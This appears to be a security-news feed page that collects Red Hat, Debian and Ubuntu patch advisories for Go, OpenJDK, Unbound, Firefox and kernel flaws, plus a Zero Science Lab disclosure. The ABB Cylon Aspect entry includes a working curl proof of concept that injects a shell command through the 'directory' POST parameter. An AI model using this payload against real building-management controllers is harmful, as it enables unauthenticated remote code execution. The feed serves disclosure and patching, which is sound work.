Red Hat Security Advisory 2024-8229-03 - Red Hat OpenShift Container Platform release 4.17.2 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8229.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.17.2 bug fix and security update  
Advisory ID:        RHSA-2024:8229-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8229  
Issue date:         2024-10-23  
Revision:           03  
CVE Names:          CVE-2024-28180  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.17.2 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.17.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.  
Security Fix(es):

* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* jose-go: improper handling of highly compressed data (CVE-2024-28180)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)  
* openstack-ironic: Lack of checksum validation on images (CVE-2024-47211)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

Solution:

CVEs:

CVE-2024-28180

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://bugzilla.redhat.com/show_bug.cgi?id=2315010  
https://issues.redhat.com/browse/OCPBUGS-36453  
https://issues.redhat.com/browse/OCPBUGS-38116  
https://issues.redhat.com/browse/OCPBUGS-41552  
https://issues.redhat.com/browse/OCPBUGS-42176  
https://issues.redhat.com/browse/OCPBUGS-42349  
https://issues.redhat.com/browse/OCPBUGS-42607  
https://issues.redhat.com/browse/OCPBUGS-42716  
https://issues.redhat.com/browse/OCPBUGS-42784  
https://issues.redhat.com/browse/OCPBUGS-42803  
https://issues.redhat.com/browse/OCPBUGS-42806  
https://issues.redhat.com/browse/OCPBUGS-42839  
https://issues.redhat.com/browse/OCPBUGS-42842  
https://issues.redhat.com/browse/OCPBUGS-42953  
https://issues.redhat.com/browse/OCPBUGS-42954  
https://issues.redhat.com/browse/OCPBUGS-42958  
https://issues.redhat.com/browse/OCPBUGS-42974  
https://issues.redhat.com/browse/OCPBUGS-42996  
https://issues.redhat.com/browse/OCPBUGS-42997  
https://issues.redhat.com/browse/OCPBUGS-43009  
https://issues.redhat.com/browse/OCPBUGS-43051  
https://issues.redhat.com/browse/OCPBUGS-43069  
https://issues.redhat.com/browse/OCPBUGS-43112  
https://issues.redhat.com/browse/OCPBUGS-43227  
https://issues.redhat.com/browse/OCPBUGS-43312  
https://issues.redhat.com/browse/OCPBUGS-43321

Red Hat Security Advisory 2024-8229-03

Red Hat Security Advisory 2024-8228-03 - Red Hat OpenShift Container Platform release 4.17.2 is now available with updates to packages and images that fix several bugs.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8228.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Low: OpenShift Container Platform 4.17.2 security and extras update  
Advisory ID:        RHSA-2024:8228-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8228  
Issue date:         2024-10-22  
Revision:           03  
CVE Names:          CVE-2023-37920  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.17.2 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.17.

Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.17.2. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:8229

Security Fix(es):

* python-certifi: Removal of e-Tugra root certificate (CVE-2023-37920)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.17 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.17/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.17/release_notes/ocp-4-17-release-notes.html

CVEs:

CVE-2023-37920

References:

https://access.redhat.com/security/updates/classification/#low  
https://bugzilla.redhat.com/show_bug.cgi?id=2226586

Red Hat Security Advisory 2024-8228-03

Red Hat Security Advisory 2024-6341-03 - Kube Descheduler Operator for Red Hat OpenShift 5.1.0 for RHEL 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_6341.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Kube Descheduler Operator for Red Hat OpenShift 5.1.0 for RHEL 9  
Advisory ID:        RHSA-2024:6341-03  
Product:            Kube Descheduler Operator  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6341  
Issue date:         2024-10-23  
Revision:           03  
CVE Names:          CVE-2024-24788  
====================================================================

Summary: 

Kube Descheduler Operator for Red Hat OpenShift 5.1.0 for RHEL 9

Description:

The Kube Descheduler Operator for Red Hat OpenShift is an optional  
operator that deploys the descheduler, which is responsible for  
evicting pods based on certain strategies.

Security Fix(es):

* golang: net: malformed DNS message can cause infinite loop (CVE-2024-24788)  
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)  
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)

Solution:

CVEs:

CVE-2024-24788

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2279814  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://issues.redhat.com/browse/OCPBUGS-11891  
https://issues.redhat.com/browse/OCPBUGS-41860

Red Hat Security Advisory 2024-6341-03

Debian Linux Security Advisory 5795-1 - Cedric Krier discovered that python-sql, a library to write SQL queries in a pythonic way, performed insufficient sanitizing which could result in SQL injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5795-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 21, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-sqlCVE ID         : CVE-2024-9774Cedric Krier discovered that python-sql, a library to write SQL queriesin a pythonic way, performed insufficient sanitising which could resultin SQL injection.For the stable distribution (bookworm), this problem has been fixed inversion 1.4.0-1+deb12u1.We recommend that you upgrade your python-sql packages.For the detailed security status of python-sql please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-sqlFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcWnkYACgkQEMKTtsN8TjYrzBAAtMjk7yF0IB4onUZ+GHMkYCDoPhZRaZft7eQUAGya1/IHpuA4e5KvmWahJK8D1glflGgopSLhLSkPkXWij3LqKjb2obuqRB9icuEl1mKWeJoovHWONZLCUVSt0iPtAvLA4jIi4KpHRfzFY4QbpkkAKXAjTLjxtjDlmEky4PT+1puHAi7lQ7O2/OY/haxnVYHtoHID+E6r0eTgXq5HX9723niVkxKpjcZz8ki8WeDoEmNUOj4j89Nke0VeQNFYmCuWtAQLvRFTSL4I9fGWcRBWWEHm46YqnktlJIHVe2f9posYCMMFxvFwNo70U3MUinCDAXX6VmeAGuzTXGQAPXW0kDT7Y436ononkFcnVMoiCr/T/+m3UKUw+2iINEcnMe/G/4wkhiYx7T2YYFmJ4vRgye7sSE4YfRl6/wl/rbeVfz3AfM/iAxp7uWAlzVLry4mL1ZkNhAhvTDCpEIsBECDp1gX2z4ZVLqHDqXIqQ+IEEFIZoNImUo/LIgKvZIg18XuP77K29UAnonUe1qxf8d19nRwD18hwoQG1KL6dCRgKhE+OKjTRCZv+9hb1Xp7QagQviZTCnP+36HFtpNfbim/JlAtllEZrUdufBcMzAVx82C9oVHd8WigI+PWGSFnh5qzy0B1xhX7H3x5zLaVO1HJ6ZHzyH5VcfCFSxmzV6MeyzFk==Xlam-----END PGP SIGNATURE-----

Debian Security Advisory 5795-1

Debian Linux Security Advisory 5794-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5794-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 21, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2024-21208 CVE-2024-21210 CVE-2024-21217 CVE-2024-21235Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in denial of service or information disclosure.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.13+11-2~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcWmOcACgkQEMKTtsN8TjYeZw/7BTQ3D6sDygG5LotB4JCo8QMyG1rx0XgX9dAgK4Xw0sp9jnYS2iebp8RhlbIDht+jchjLpbEPnzx11JM2b3e/x3JO1QRUSEDkTnQhuynR4wj7WKLXY4l36zkzG/73g9Tq/EM5t8vjuMWFFcsEIJ5c0erHaw/X5lAr9Gg0vs8LrLYyqOMod8Z8AZJpbKNJpGEDUu/i1lASkDnjJAl5+ybPG5xN++Ax+FvPhmlQKu39rVKrX140+LIkFcGJdLh+RMbLU66ryDR2rQQSgeDeZYZln5gsbykzRbfeZZil4bF0+aT3FCY0/nOA0aA82nrE9S6VU6kdxWyS/KTzRsVUw8IsIW/9KyD3hAGvEbHiD4hG/YrABOFdg4rvUPLnaBU6i+LnyrdcayoFP6cp72KiBOQxn4nUzUqhqynKatZ5ixZfgboaTFKBr2WxazoWTzrefjyH30GEeQ0dWFc2ujcOlMZSag9VdfgIoVg+F2l20UbmKnYtZGSXm5rD2ocG5l7gTb8uDcZO3P1HXGmrD7A8NLy9aRPT/dmNDLnAo8se61O4ctirgNQ3dIpwzeIEyjPNysY0lON5+7EE7XToW2C7dSYjHSVCNTqE+heRE66p7hDBxyeuhxhBK+Bd7DcAT97Kkp1BOZ0XSn9YjQ9zdyzQneOxMK7CbM6/PIETqGsY6aTIptI==PgDB-----END PGP SIGNATURE-----

Debian Security Advisory 5794-1

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the directory HTTP POST parameter called by the persistenceManagerAjax.php script.

  
ABB Cylon Aspect 3.08.01 (persistenceManagerAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'directory' HTTP POST parameter called by the  
persistenceManagerAjax.php script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5846  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5846.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl "http://192.168.73.31/persistenceManagerAjax.php" \  
> -d "command=deleteVMobile\  
> &directory=`sleep 17`"

ABB Cylon Aspect 3.08.01 persistenceManagerAjax.php Command Injection

This white paper, titled "DTLS 'ClientHello' Race Conditions in WebRTC Implementations," details a security vulnerability affecting multiple WebRTC implementations. The research uncovers a security flaw where certain implementations fail to properly verify the origin of DTLS "ClientHello" messages in WebRTC sessions, potentially leading to denial of service attacks. The paper includes methodology, affected systems, and recommendations for mitigation.

DTLS ClientHello Race Conditions In WebRTC Implementations

Ubuntu Security Notice 7080-1 - Toshifumi Sakaguchi discovered that Unbound incorrectly handled name compression for large RRsets, which could lead to excessive CPU usage. An attacker could potentially use this issue to cause a denial of service by sending specially crafted DNS responses.

==========================================================================  
Ubuntu Security Notice USN-7080-1  
October 22, 2024

unbound vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Unbound could be made to stop responding if it received specially crafted  
DNS traffic.

Software Description:  
- unbound: validating, recursive, caching DNS resolver

Details:

Toshifumi Sakaguchi discovered that Unbound incorrectly handled name  
compression for large RRsets, which could lead to excessive CPU usage.  
An attacker could potentially use this issue to cause a denial of service  
by sending specially crafted DNS responses.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  libunbound8                     1.20.0-1ubuntu2.1  
  unbound                         1.20.0-1ubuntu2.1

Ubuntu 24.04 LTS  
  libunbound8                     1.19.2-1ubuntu3.3  
  unbound                         1.19.2-1ubuntu3.3

Ubuntu 22.04 LTS  
  libunbound8                     1.13.1-1ubuntu5.8  
  unbound                         1.13.1-1ubuntu5.8

Ubuntu 20.04 LTS  
  libunbound8                     1.9.4-2ubuntu1.9  
  unbound                         1.9.4-2ubuntu1.9

Ubuntu 18.04 LTS  
  libunbound2                     1.6.7-1ubuntu2.6+esm3  
                                  Available with Ubuntu Pro  
  unbound                         1.6.7-1ubuntu2.6+esm3  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  libunbound2                     1.5.8-1ubuntu1.1+esm2  
                                  Available with Ubuntu Pro  
  unbound                         1.5.8-1ubuntu1.1+esm2  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  libunbound2                     1.4.22-1ubuntu4.14.04.3+esm2  
                                  Available with Ubuntu Pro  
  unbound                         1.4.22-1ubuntu4.14.04.3+esm2  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7080-1  
  CVE-2024-8508

Package Information:  
  https://launchpad.net/ubuntu/+source/unbound/1.20.0-1ubuntu2.1  
  https://launchpad.net/ubuntu/+source/unbound/1.19.2-1ubuntu3.3  
  https://launchpad.net/ubuntu/+source/unbound/1.13.1-1ubuntu5.8  
  https://launchpad.net/ubuntu/+source/unbound/1.9.4-2ubuntu1.9

Ubuntu Security Notice USN-7080-1

Ubuntu Security Notice 7078-1 - Atte Kettunen discovered that Firefox did not properly validate before inserting ranges into the selection node cache. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7078-1October 22, 2024firefox vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Firefox could be made to crash or run programs as your loginSoftware Description:- firefox: Mozilla Open Source web browserDetails:Atte Kettunen discovered that Firefox did not properly validate beforeinserting ranges into the selection node cache. An attacker could possiblyuse this issue to cause a denial of service or execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  firefox                         131.0.3+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-7078-1  CVE-2024-9936Package Information:  https://launchpad.net/ubuntu/+source/firefox/131.0.3+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7078-1

Ubuntu Security Notice 7072-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7072-2October 21, 2024linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - Watchdog drivers;  - Netfilter;  - Network traffic control;(CVE-2024-38630, CVE-2024-27397, CVE-2024-45016)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-5.15.0-1068-gke     5.15.0-1068.74  linux-image-gke                 5.15.0.1068.67  linux-image-gke-5.15            5.15.0.1068.67After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7072-2  https://ubuntu.com/security/notices/USN-7072-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1068.74